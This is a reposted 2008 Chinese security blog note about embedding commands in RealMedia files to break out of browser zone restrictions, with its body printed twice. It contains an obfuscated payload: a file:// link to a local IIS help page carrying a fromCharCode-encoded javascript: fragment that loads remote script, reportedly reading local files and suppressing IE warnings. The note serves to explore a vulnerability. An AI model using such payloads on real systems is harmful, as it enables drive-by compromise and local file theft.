rm格式插入廣告代碼
更新時(shí)間:2008年02月14日 22:43:38 作者:
rm格式插入廣告代碼
很久以前就有這個(gè)東西,當(dāng)時(shí)都是用來掛馬的,不過忽然想起來,如果能跳到j(luò)avascript:這樣的格式在本地執(zhí)行js代碼意義還是有點(diǎn)的吧,于是測試了下.結(jié)果很讓人沮喪,realplay對這個(gè)好象倒是有限制,而且查看被插入的rm文件里看出應(yīng)該是本身就做了限制,看來支持的協(xié)議不多啊....于是試試file:///,結(jié)果發(fā)現(xiàn)是支持的,于是想到前段時(shí)間的html injection,如果加起來應(yīng)該有點(diǎn)效果.
u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/
這段代碼插進(jìn)去會出現(xiàn)一個(gè)詭異的連接,點(diǎn)擊下會執(zhí)行我指定的js(微軟的工程師還是很小心的,暫時(shí)正常情況下找到的html就這一個(gè),而且還要點(diǎn)......),而且事實(shí)證明的確是本地域執(zhí)行的,可以讀本地的文件,呵呵......而且在realone播放的情況下,ie那個(gè)本地執(zhí)行js代碼的警告居然會神奇地消失,于是放到html頁面播放,果然很郁悶,打開任何html都會警告,不過還是神奇地能打開本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到個(gè)本地存在問題的html就OK啦,呵呵.......
真希望這些邊緣的地方能出點(diǎn)問題,我感覺還是可能的 :)
復(fù)制代碼 代碼如下:
u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/
這段代碼插進(jìn)去會出現(xiàn)一個(gè)詭異的連接,點(diǎn)擊下會執(zhí)行我指定的js(微軟的工程師還是很小心的,暫時(shí)正常情況下找到的html就這一個(gè),而且還要點(diǎn)......),而且事實(shí)證明的確是本地域執(zhí)行的,可以讀本地的文件,呵呵......而且在realone播放的情況下,ie那個(gè)本地執(zhí)行js代碼的警告居然會神奇地消失,于是放到html頁面播放,果然很郁悶,打開任何html都會警告,不過還是神奇地能打開本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到個(gè)本地存在問題的html就OK啦,呵呵.......
真希望這些邊緣的地方能出點(diǎn)問題,我感覺還是可能的 :)
相關(guān)文章
攻擊方式學(xué)習(xí)之SQL注入(SQL Injection)
有些網(wǎng)站將直接拿用戶的輸入 來拼接SQL語句,進(jìn)行查詢等操作,同時(shí)也將錯(cuò)誤信息暴露給用戶。2008-09-09怎么查QQ聊天記錄 怎樣恢復(fù)刪除的手機(jī)QQ聊天記錄技巧?
怎么查QQ聊天記錄 怎樣恢復(fù)刪除的手機(jī)QQ聊天記錄技巧?究竟對方在隱瞞什么呢,大家可以通過下面的方法試試。2012-01-01